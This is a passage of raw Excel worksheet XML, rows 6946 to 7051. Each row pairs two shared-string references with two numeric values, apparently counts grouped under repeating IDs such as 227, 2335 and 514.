    <row r="6946" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6946" t="s">
        <v>16228</v>
      </c>
      <c r="B6946" t="s">
        <v>16217</v>
      </c>
      <c r="C6946">
        <v>259</v>
      </c>
      <c r="D6946">
        <v>227</v>
      </c>
    </row>
    <row r="6947" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6947" t="s">
        <v>16231</v>
      </c>
      <c r="B6947" t="s">
        <v>16218</v>
      </c>
      <c r="C6947">
        <v>385</v>
      </c>
      <c r="D6947">
        <v>227</v>
      </c>
    </row>
    <row r="6948" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6948" t="s">
        <v>16229</v>
      </c>
      <c r="B6948" t="s">
        <v>16219</v>
      </c>
      <c r="C6948">
        <v>0</v>
      </c>
      <c r="D6948">
        <v>227</v>
      </c>
    </row>
    <row r="6949" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6949" t="s">
        <v>16230</v>
      </c>
      <c r="B6949" t="s">
        <v>16220</v>
      </c>
      <c r="C6949">
        <v>60</v>
      </c>
      <c r="D6949">
        <v>227</v>
      </c>
    </row>
    <row r="6950" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6950" t="s">
        <v>16229</v>
      </c>
      <c r="B6950" t="s">
        <v>16221</v>
      </c>
      <c r="C6950">
        <v>0</v>
      </c>
      <c r="D6950">
        <v>227</v>
      </c>
    </row>
    <row r="6951" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6951" t="s">
        <v>16230</v>
      </c>
      <c r="B6951" t="s">
        <v>16222</v>
      </c>
      <c r="C6951">
        <v>0</v>
      </c>
      <c r="D6951">
        <v>227</v>
      </c>
    </row>
    <row r="6952" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6952" t="s">
        <v>16223</v>
      </c>
      <c r="B6952" t="s">
        <v>16223</v>
      </c>
      <c r="C6952">
        <v>26</v>
      </c>
      <c r="D6952">
        <v>227</v>
      </c>
    </row>
    <row r="6953" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6953" t="s">
        <v>16224</v>
      </c>
      <c r="B6953" t="s">
        <v>16224</v>
      </c>
      <c r="C6953">
        <v>1</v>
      </c>
      <c r="D6953">
        <v>227</v>
      </c>
    </row>
    <row r="6954" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6954" t="s">
        <v>16228</v>
      </c>
      <c r="B6954" t="s">
        <v>16211</v>
      </c>
      <c r="C6954">
        <v>0</v>
      </c>
      <c r="D6954">
        <v>2335</v>
      </c>
    </row>
    <row r="6955" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6955" t="s">
        <v>16231</v>
      </c>
      <c r="B6955" t="s">
        <v>16212</v>
      </c>
      <c r="C6955">
        <v>0</v>
      </c>
      <c r="D6955">
        <v>2335</v>
      </c>
    </row>
    <row r="6956" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6956" t="s">
        <v>16228</v>
      </c>
      <c r="B6956" t="s">
        <v>16213</v>
      </c>
      <c r="C6956">
        <v>0</v>
      </c>
      <c r="D6956">
        <v>2335</v>
      </c>
    </row>
    <row r="6957" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6957" t="s">
        <v>16231</v>
      </c>
      <c r="B6957" t="s">
        <v>16214</v>
      </c>
      <c r="C6957">
        <v>0</v>
      </c>
      <c r="D6957">
        <v>2335</v>
      </c>
    </row>
    <row r="6958" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6958" t="s">
        <v>16228</v>
      </c>
      <c r="B6958" t="s">
        <v>16215</v>
      </c>
      <c r="C6958">
        <v>0</v>
      </c>
      <c r="D6958">
        <v>2335</v>
      </c>
    </row>
    <row r="6959" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6959" t="s">
        <v>16231</v>
      </c>
      <c r="B6959" t="s">
        <v>16216</v>
      </c>
      <c r="C6959">
        <v>3</v>
      </c>
      <c r="D6959">
        <v>2335</v>
      </c>
    </row>
    <row r="6960" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6960" t="s">
        <v>16228</v>
      </c>
      <c r="B6960" t="s">
        <v>16217</v>
      </c>
      <c r="C6960">
        <v>1</v>
      </c>
      <c r="D6960">
        <v>2335</v>
      </c>
    </row>
    <row r="6961" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6961" t="s">
        <v>16231</v>
      </c>
      <c r="B6961" t="s">
        <v>16218</v>
      </c>
      <c r="C6961">
        <v>17</v>
      </c>
      <c r="D6961">
        <v>2335</v>
      </c>
    </row>
    <row r="6962" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6962" t="s">
        <v>16229</v>
      </c>
      <c r="B6962" t="s">
        <v>16219</v>
      </c>
      <c r="C6962">
        <v>0</v>
      </c>
      <c r="D6962">
        <v>2335</v>
      </c>
    </row>
    <row r="6963" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6963" t="s">
        <v>16230</v>
      </c>
      <c r="B6963" t="s">
        <v>16220</v>
      </c>
      <c r="C6963">
        <v>0</v>
      </c>
      <c r="D6963">
        <v>2335</v>
      </c>
    </row>
    <row r="6964" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6964" t="s">
        <v>16229</v>
      </c>
      <c r="B6964" t="s">
        <v>16221</v>
      </c>
      <c r="C6964">
        <v>0</v>
      </c>
      <c r="D6964">
        <v>2335</v>
      </c>
    </row>
    <row r="6965" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6965" t="s">
        <v>16230</v>
      </c>
      <c r="B6965" t="s">
        <v>16222</v>
      </c>
      <c r="C6965">
        <v>0</v>
      </c>
      <c r="D6965">
        <v>2335</v>
      </c>
    </row>
    <row r="6966" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6966" t="s">
        <v>16223</v>
      </c>
      <c r="B6966" t="s">
        <v>16223</v>
      </c>
      <c r="C6966">
        <v>30</v>
      </c>
      <c r="D6966">
        <v>2335</v>
      </c>
    </row>
    <row r="6967" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6967" t="s">
        <v>16224</v>
      </c>
      <c r="B6967" t="s">
        <v>16224</v>
      </c>
      <c r="C6967">
        <v>0</v>
      </c>
      <c r="D6967">
        <v>2335</v>
      </c>
    </row>
    <row r="6968" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6968" t="s">
        <v>16228</v>
      </c>
      <c r="B6968" t="s">
        <v>16211</v>
      </c>
      <c r="C6968">
        <v>0</v>
      </c>
      <c r="D6968">
        <v>514</v>
      </c>
    </row>
    <row r="6969" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6969" t="s">
        <v>16231</v>
      </c>
      <c r="B6969" t="s">
        <v>16212</v>
      </c>
      <c r="C6969">
        <v>0</v>
      </c>
      <c r="D6969">
        <v>514</v>
      </c>
    </row>
    <row r="6970" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6970" t="s">
        <v>16228</v>
      </c>
      <c r="B6970" t="s">
        <v>16213</v>
      </c>
      <c r="C6970">
        <v>0</v>
      </c>
      <c r="D6970">
        <v>514</v>
      </c>
    </row>
    <row r="6971" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6971" t="s">
        <v>16231</v>
      </c>
      <c r="B6971" t="s">
        <v>16214</v>
      </c>
      <c r="C6971">
        <v>0</v>
      </c>
      <c r="D6971">
        <v>514</v>
      </c>
    </row>
    <row r="6972" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6972" t="s">
        <v>16228</v>
      </c>
      <c r="B6972" t="s">
        <v>16215</v>
      </c>
      <c r="C6972">
        <v>5</v>
      </c>
      <c r="D6972">
        <v>514</v>
      </c>
    </row>
    <row r="6973" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6973" t="s">
        <v>16231</v>
      </c>
      <c r="B6973" t="s">
        <v>16216</v>
      </c>
      <c r="C6973">
        <v>5</v>
      </c>
      <c r="D6973">
        <v>514</v>
      </c>
    </row>
    <row r="6974" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6974" t="s">
        <v>16228</v>
      </c>
      <c r="B6974" t="s">
        <v>16217</v>
      </c>
      <c r="C6974">
        <v>15</v>
      </c>
      <c r="D6974">
        <v>514</v>
      </c>
    </row>
    <row r="6975" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6975" t="s">
        <v>16231</v>
      </c>
      <c r="B6975" t="s">
        <v>16218</v>
      </c>
      <c r="C6975">
        <v>10</v>
      </c>
      <c r="D6975">
        <v>514</v>
      </c>
    </row>
    <row r="6976" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6976" t="s">
        <v>16229</v>
      </c>
      <c r="B6976" t="s">
        <v>16219</v>
      </c>
      <c r="C6976">
        <v>0</v>
      </c>
      <c r="D6976">
        <v>514</v>
      </c>
    </row>
    <row r="6977" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6977" t="s">
        <v>16230</v>
      </c>
      <c r="B6977" t="s">
        <v>16220</v>
      </c>
      <c r="C6977">
        <v>0</v>
      </c>
      <c r="D6977">
        <v>514</v>
      </c>
    </row>
    <row r="6978" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6978" t="s">
        <v>16229</v>
      </c>
      <c r="B6978" t="s">
        <v>16221</v>
      </c>
      <c r="C6978">
        <v>15</v>
      </c>
      <c r="D6978">
        <v>514</v>
      </c>
    </row>
    <row r="6979" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6979" t="s">
        <v>16230</v>
      </c>
      <c r="B6979" t="s">
        <v>16222</v>
      </c>
      <c r="C6979">
        <v>20</v>
      </c>
      <c r="D6979">
        <v>514</v>
      </c>
    </row>
    <row r="6980" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6980" t="s">
        <v>16223</v>
      </c>
      <c r="B6980" t="s">
        <v>16223</v>
      </c>
      <c r="C6980">
        <v>1</v>
      </c>
      <c r="D6980">
        <v>514</v>
      </c>
    </row>
    <row r="6981" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6981" t="s">
        <v>16224</v>
      </c>
      <c r="B6981" t="s">
        <v>16224</v>
      </c>
      <c r="C6981">
        <v>25</v>
      </c>
      <c r="D6981">
        <v>514</v>
      </c>
    </row>
    <row r="6982" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6982" t="s">
        <v>16228</v>
      </c>
      <c r="B6982" t="s">
        <v>16211</v>
      </c>
      <c r="C6982">
        <v>0</v>
      </c>
      <c r="D6982">
        <v>248</v>
      </c>
    </row>
    <row r="6983" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6983" t="s">
        <v>16231</v>
      </c>
      <c r="B6983" t="s">
        <v>16212</v>
      </c>
      <c r="C6983">
        <v>0</v>
      </c>
      <c r="D6983">
        <v>248</v>
      </c>
    </row>
    <row r="6984" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6984" t="s">
        <v>16228</v>
      </c>
      <c r="B6984" t="s">
        <v>16213</v>
      </c>
      <c r="C6984">
        <v>0</v>
      </c>
      <c r="D6984">
        <v>248</v>
      </c>
    </row>
    <row r="6985" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6985" t="s">
        <v>16231</v>
      </c>
      <c r="B6985" t="s">
        <v>16214</v>
      </c>
      <c r="C6985">
        <v>0</v>
      </c>
      <c r="D6985">
        <v>248</v>
      </c>
    </row>
    <row r="6986" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6986" t="s">
        <v>16228</v>
      </c>
      <c r="B6986" t="s">
        <v>16215</v>
      </c>
      <c r="C6986">
        <v>3</v>
      </c>
      <c r="D6986">
        <v>248</v>
      </c>
    </row>
    <row r="6987" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6987" t="s">
        <v>16231</v>
      </c>
      <c r="B6987" t="s">
        <v>16216</v>
      </c>
      <c r="C6987">
        <v>1</v>
      </c>
      <c r="D6987">
        <v>248</v>
      </c>
    </row>
    <row r="6988" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6988" t="s">
        <v>16228</v>
      </c>
      <c r="B6988" t="s">
        <v>16217</v>
      </c>
      <c r="C6988">
        <v>5</v>
      </c>
      <c r="D6988">
        <v>248</v>
      </c>
    </row>
    <row r="6989" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6989" t="s">
        <v>16231</v>
      </c>
      <c r="B6989" t="s">
        <v>16218</v>
      </c>
      <c r="C6989">
        <v>10</v>
      </c>
      <c r="D6989">
        <v>248</v>
      </c>
    </row>
    <row r="6990" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6990" t="s">
        <v>16229</v>
      </c>
      <c r="B6990" t="s">
        <v>16219</v>
      </c>
      <c r="C6990">
        <v>0</v>
      </c>
      <c r="D6990">
        <v>248</v>
      </c>
    </row>
    <row r="6991" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6991" t="s">
        <v>16230</v>
      </c>
      <c r="B6991" t="s">
        <v>16220</v>
      </c>
      <c r="C6991">
        <v>0</v>
      </c>
      <c r="D6991">
        <v>248</v>
      </c>
    </row>
    <row r="6992" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6992" t="s">
        <v>16229</v>
      </c>
      <c r="B6992" t="s">
        <v>16221</v>
      </c>
      <c r="C6992">
        <v>15</v>
      </c>
      <c r="D6992">
        <v>248</v>
      </c>
    </row>
    <row r="6993" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6993" t="s">
        <v>16230</v>
      </c>
      <c r="B6993" t="s">
        <v>16222</v>
      </c>
      <c r="C6993">
        <v>190</v>
      </c>
      <c r="D6993">
        <v>248</v>
      </c>
    </row>
    <row r="6994" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6994" t="s">
        <v>16223</v>
      </c>
      <c r="B6994" t="s">
        <v>16223</v>
      </c>
      <c r="C6994">
        <v>1</v>
      </c>
      <c r="D6994">
        <v>248</v>
      </c>
    </row>
    <row r="6995" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6995" t="s">
        <v>16224</v>
      </c>
      <c r="B6995" t="s">
        <v>16224</v>
      </c>
      <c r="C6995">
        <v>1</v>
      </c>
      <c r="D6995">
        <v>248</v>
      </c>
    </row>
    <row r="6996" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6996" t="s">
        <v>16228</v>
      </c>
      <c r="B6996" t="s">
        <v>16211</v>
      </c>
      <c r="C6996">
        <v>0</v>
      </c>
      <c r="D6996">
        <v>507</v>
      </c>
    </row>
    <row r="6997" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6997" t="s">
        <v>16231</v>
      </c>
      <c r="B6997" t="s">
        <v>16212</v>
      </c>
      <c r="C6997">
        <v>0</v>
      </c>
      <c r="D6997">
        <v>507</v>
      </c>
    </row>
    <row r="6998" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6998" t="s">
        <v>16228</v>
      </c>
      <c r="B6998" t="s">
        <v>16213</v>
      </c>
      <c r="C6998">
        <v>0</v>
      </c>
      <c r="D6998">
        <v>507</v>
      </c>
    </row>
    <row r="6999" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6999" t="s">
        <v>16231</v>
      </c>
      <c r="B6999" t="s">
        <v>16214</v>
      </c>
      <c r="C6999">
        <v>0</v>
      </c>
      <c r="D6999">
        <v>507</v>
      </c>
    </row>
    <row r="7000" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7000" t="s">
        <v>16228</v>
      </c>
      <c r="B7000" t="s">
        <v>16215</v>
      </c>
      <c r="C7000">
        <v>8</v>
      </c>
      <c r="D7000">
        <v>507</v>
      </c>
    </row>
    <row r="7001" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7001" t="s">
        <v>16231</v>
      </c>
      <c r="B7001" t="s">
        <v>16216</v>
      </c>
      <c r="C7001">
        <v>13</v>
      </c>
      <c r="D7001">
        <v>507</v>
      </c>
    </row>
    <row r="7002" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7002" t="s">
        <v>16228</v>
      </c>
      <c r="B7002" t="s">
        <v>16217</v>
      </c>
      <c r="C7002">
        <v>77</v>
      </c>
      <c r="D7002">
        <v>507</v>
      </c>
    </row>
    <row r="7003" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7003" t="s">
        <v>16231</v>
      </c>
      <c r="B7003" t="s">
        <v>16218</v>
      </c>
      <c r="C7003">
        <v>191</v>
      </c>
      <c r="D7003">
        <v>507</v>
      </c>
    </row>
    <row r="7004" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7004" t="s">
        <v>16229</v>
      </c>
      <c r="B7004" t="s">
        <v>16219</v>
      </c>
      <c r="C7004">
        <v>0</v>
      </c>
      <c r="D7004">
        <v>507</v>
      </c>
    </row>
    <row r="7005" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7005" t="s">
        <v>16230</v>
      </c>
      <c r="B7005" t="s">
        <v>16220</v>
      </c>
      <c r="C7005">
        <v>1</v>
      </c>
      <c r="D7005">
        <v>507</v>
      </c>
    </row>
    <row r="7006" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7006" t="s">
        <v>16229</v>
      </c>
      <c r="B7006" t="s">
        <v>16221</v>
      </c>
      <c r="C7006">
        <v>59</v>
      </c>
      <c r="D7006">
        <v>507</v>
      </c>
    </row>
    <row r="7007" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7007" t="s">
        <v>16230</v>
      </c>
      <c r="B7007" t="s">
        <v>16222</v>
      </c>
      <c r="C7007">
        <v>64</v>
      </c>
      <c r="D7007">
        <v>507</v>
      </c>
    </row>
    <row r="7008" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7008" t="s">
        <v>16223</v>
      </c>
      <c r="B7008" t="s">
        <v>16223</v>
      </c>
      <c r="C7008">
        <v>25</v>
      </c>
      <c r="D7008">
        <v>507</v>
      </c>
    </row>
    <row r="7009" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7009" t="s">
        <v>16224</v>
      </c>
      <c r="B7009" t="s">
        <v>16224</v>
      </c>
      <c r="C7009">
        <v>1</v>
      </c>
      <c r="D7009">
        <v>507</v>
      </c>
    </row>
    <row r="7010" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7010" t="s">
        <v>16228</v>
      </c>
      <c r="B7010" t="s">
        <v>16211</v>
      </c>
      <c r="C7010">
        <v>0</v>
      </c>
      <c r="D7010">
        <v>684</v>
      </c>
    </row>
    <row r="7011" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7011" t="s">
        <v>16231</v>
      </c>
      <c r="B7011" t="s">
        <v>16212</v>
      </c>
      <c r="C7011">
        <v>0</v>
      </c>
      <c r="D7011">
        <v>684</v>
      </c>
    </row>
    <row r="7012" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7012" t="s">
        <v>16228</v>
      </c>
      <c r="B7012" t="s">
        <v>16213</v>
      </c>
      <c r="C7012">
        <v>0</v>
      </c>
      <c r="D7012">
        <v>684</v>
      </c>
    </row>
    <row r="7013" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7013" t="s">
        <v>16231</v>
      </c>
      <c r="B7013" t="s">
        <v>16214</v>
      </c>
      <c r="C7013">
        <v>1</v>
      </c>
      <c r="D7013">
        <v>684</v>
      </c>
    </row>
    <row r="7014" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7014" t="s">
        <v>16228</v>
      </c>
      <c r="B7014" t="s">
        <v>16215</v>
      </c>
      <c r="C7014">
        <v>0</v>
      </c>
      <c r="D7014">
        <v>684</v>
      </c>
    </row>
    <row r="7015" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7015" t="s">
        <v>16231</v>
      </c>
      <c r="B7015" t="s">
        <v>16216</v>
      </c>
      <c r="C7015">
        <v>1</v>
      </c>
      <c r="D7015">
        <v>684</v>
      </c>
    </row>
    <row r="7016" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7016" t="s">
        <v>16228</v>
      </c>
      <c r="B7016" t="s">
        <v>16217</v>
      </c>
      <c r="C7016">
        <v>2</v>
      </c>
      <c r="D7016">
        <v>684</v>
      </c>
    </row>
    <row r="7017" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7017" t="s">
        <v>16231</v>
      </c>
      <c r="B7017" t="s">
        <v>16218</v>
      </c>
      <c r="C7017">
        <v>0</v>
      </c>
      <c r="D7017">
        <v>684</v>
      </c>
    </row>
    <row r="7018" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7018" t="s">
        <v>16229</v>
      </c>
      <c r="B7018" t="s">
        <v>16219</v>
      </c>
      <c r="C7018">
        <v>0</v>
      </c>
      <c r="D7018">
        <v>684</v>
      </c>
    </row>
    <row r="7019" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7019" t="s">
        <v>16230</v>
      </c>
      <c r="B7019" t="s">
        <v>16220</v>
      </c>
      <c r="C7019">
        <v>0</v>
      </c>
      <c r="D7019">
        <v>684</v>
      </c>
    </row>
    <row r="7020" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7020" t="s">
        <v>16229</v>
      </c>
      <c r="B7020" t="s">
        <v>16221</v>
      </c>
      <c r="C7020">
        <v>2</v>
      </c>
      <c r="D7020">
        <v>684</v>
      </c>
    </row>
    <row r="7021" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7021" t="s">
        <v>16230</v>
      </c>
      <c r="B7021" t="s">
        <v>16222</v>
      </c>
      <c r="C7021">
        <v>0</v>
      </c>
      <c r="D7021">
        <v>684</v>
      </c>
    </row>
    <row r="7022" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7022" t="s">
        <v>16223</v>
      </c>
      <c r="B7022" t="s">
        <v>16223</v>
      </c>
      <c r="C7022">
        <v>14</v>
      </c>
      <c r="D7022">
        <v>684</v>
      </c>
    </row>
    <row r="7023" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7023" t="s">
        <v>16224</v>
      </c>
      <c r="B7023" t="s">
        <v>16224</v>
      </c>
      <c r="C7023">
        <v>0</v>
      </c>
      <c r="D7023">
        <v>684</v>
      </c>
    </row>
    <row r="7024" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7024" t="s">
        <v>16231</v>
      </c>
      <c r="B7024" t="s">
        <v>16214</v>
      </c>
      <c r="C7024">
        <v>0</v>
      </c>
      <c r="D7024">
        <v>684</v>
      </c>
    </row>
    <row r="7025" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7025" t="s">
        <v>16231</v>
      </c>
      <c r="B7025" t="s">
        <v>16216</v>
      </c>
      <c r="C7025">
        <v>2</v>
      </c>
      <c r="D7025">
        <v>684</v>
      </c>
    </row>
    <row r="7026" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7026" t="s">
        <v>16228</v>
      </c>
      <c r="B7026" t="s">
        <v>16217</v>
      </c>
      <c r="C7026">
        <v>0</v>
      </c>
      <c r="D7026">
        <v>684</v>
      </c>
    </row>
    <row r="7027" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7027" t="s">
        <v>16229</v>
      </c>
      <c r="B7027" t="s">
        <v>16221</v>
      </c>
      <c r="C7027">
        <v>5</v>
      </c>
      <c r="D7027">
        <v>684</v>
      </c>
    </row>
    <row r="7028" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7028" t="s">
        <v>16228</v>
      </c>
      <c r="B7028" t="s">
        <v>16211</v>
      </c>
      <c r="C7028">
        <v>0</v>
      </c>
      <c r="D7028">
        <v>2838</v>
      </c>
    </row>
    <row r="7029" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7029" t="s">
        <v>16231</v>
      </c>
      <c r="B7029" t="s">
        <v>16212</v>
      </c>
      <c r="C7029">
        <v>0</v>
      </c>
      <c r="D7029">
        <v>2838</v>
      </c>
    </row>
    <row r="7030" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7030" t="s">
        <v>16228</v>
      </c>
      <c r="B7030" t="s">
        <v>16213</v>
      </c>
      <c r="C7030">
        <v>0</v>
      </c>
      <c r="D7030">
        <v>2838</v>
      </c>
    </row>
    <row r="7031" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7031" t="s">
        <v>16231</v>
      </c>
      <c r="B7031" t="s">
        <v>16214</v>
      </c>
      <c r="C7031">
        <v>0</v>
      </c>
      <c r="D7031">
        <v>2838</v>
      </c>
    </row>
    <row r="7032" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7032" t="s">
        <v>16228</v>
      </c>
      <c r="B7032" t="s">
        <v>16215</v>
      </c>
      <c r="C7032">
        <v>0</v>
      </c>
      <c r="D7032">
        <v>2838</v>
      </c>
    </row>
    <row r="7033" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7033" t="s">
        <v>16231</v>
      </c>
      <c r="B7033" t="s">
        <v>16216</v>
      </c>
      <c r="C7033">
        <v>1</v>
      </c>
      <c r="D7033">
        <v>2838</v>
      </c>
    </row>
    <row r="7034" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7034" t="s">
        <v>16228</v>
      </c>
      <c r="B7034" t="s">
        <v>16217</v>
      </c>
      <c r="C7034">
        <v>2</v>
      </c>
      <c r="D7034">
        <v>2838</v>
      </c>
    </row>
    <row r="7035" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7035" t="s">
        <v>16231</v>
      </c>
      <c r="B7035" t="s">
        <v>16218</v>
      </c>
      <c r="C7035">
        <v>2</v>
      </c>
      <c r="D7035">
        <v>2838</v>
      </c>
    </row>
    <row r="7036" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7036" t="s">
        <v>16229</v>
      </c>
      <c r="B7036" t="s">
        <v>16219</v>
      </c>
      <c r="C7036">
        <v>0</v>
      </c>
      <c r="D7036">
        <v>2838</v>
      </c>
    </row>
    <row r="7037" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7037" t="s">
        <v>16230</v>
      </c>
      <c r="B7037" t="s">
        <v>16220</v>
      </c>
      <c r="C7037">
        <v>0</v>
      </c>
      <c r="D7037">
        <v>2838</v>
      </c>
    </row>
    <row r="7038" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7038" t="s">
        <v>16229</v>
      </c>
      <c r="B7038" t="s">
        <v>16221</v>
      </c>
      <c r="C7038">
        <v>17</v>
      </c>
      <c r="D7038">
        <v>2838</v>
      </c>
    </row>
    <row r="7039" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7039" t="s">
        <v>16230</v>
      </c>
      <c r="B7039" t="s">
        <v>16222</v>
      </c>
      <c r="C7039">
        <v>0</v>
      </c>
      <c r="D7039">
        <v>2838</v>
      </c>
    </row>
    <row r="7040" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7040" t="s">
        <v>16223</v>
      </c>
      <c r="B7040" t="s">
        <v>16223</v>
      </c>
      <c r="C7040">
        <v>7</v>
      </c>
      <c r="D7040">
        <v>2838</v>
      </c>
    </row>
    <row r="7041" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7041" t="s">
        <v>16224</v>
      </c>
      <c r="B7041" t="s">
        <v>16224</v>
      </c>
      <c r="C7041">
        <v>1</v>
      </c>
      <c r="D7041">
        <v>2838</v>
      </c>
    </row>
    <row r="7042" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7042" t="s">
        <v>16228</v>
      </c>
      <c r="B7042" t="s">
        <v>16211</v>
      </c>
      <c r="C7042">
        <v>0</v>
      </c>
      <c r="D7042">
        <v>803</v>
      </c>
    </row>
    <row r="7043" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7043" t="s">
        <v>16231</v>
      </c>
      <c r="B7043" t="s">
        <v>16212</v>
      </c>
      <c r="C7043">
        <v>0</v>
      </c>
      <c r="D7043">
        <v>803</v>
      </c>
    </row>
    <row r="7044" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7044" t="s">
        <v>16228</v>
      </c>
      <c r="B7044" t="s">
        <v>16213</v>
      </c>
      <c r="C7044">
        <v>0</v>
      </c>
      <c r="D7044">
        <v>803</v>
      </c>
    </row>
    <row r="7045" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7045" t="s">
        <v>16231</v>
      </c>
      <c r="B7045" t="s">
        <v>16214</v>
      </c>
      <c r="C7045">
        <v>0</v>
      </c>
      <c r="D7045">
        <v>803</v>
      </c>
    </row>
    <row r="7046" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7046" t="s">
        <v>16228</v>
      </c>
      <c r="B7046" t="s">
        <v>16215</v>
      </c>
      <c r="C7046">
        <v>3</v>
      </c>
      <c r="D7046">
        <v>803</v>
      </c>
    </row>
    <row r="7047" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7047" t="s">
        <v>16231</v>
      </c>
      <c r="B7047" t="s">
        <v>16216</v>
      </c>
      <c r="C7047">
        <v>1</v>
      </c>
      <c r="D7047">
        <v>803</v>
      </c>
    </row>
    <row r="7048" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7048" t="s">
        <v>16228</v>
      </c>
      <c r="B7048" t="s">
        <v>16217</v>
      </c>
      <c r="C7048">
        <v>12</v>
      </c>
      <c r="D7048">
        <v>803</v>
      </c>
    </row>
    <row r="7049" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7049" t="s">
        <v>16231</v>
      </c>
      <c r="B7049" t="s">
        <v>16218</v>
      </c>
      <c r="C7049">
        <v>0</v>
      </c>
      <c r="D7049">
        <v>803</v>
      </c>
    </row>
    <row r="7050" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7050" t="s">
        <v>16229</v>
      </c>
      <c r="B7050" t="s">
        <v>16219</v>
      </c>
      <c r="C7050">
        <v>0</v>
      </c>
      <c r="D7050">
        <v>803</v>
      </c>
    </row>
    <row r="7051" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7051" t="s">
        <v>16230</v>
      </c>
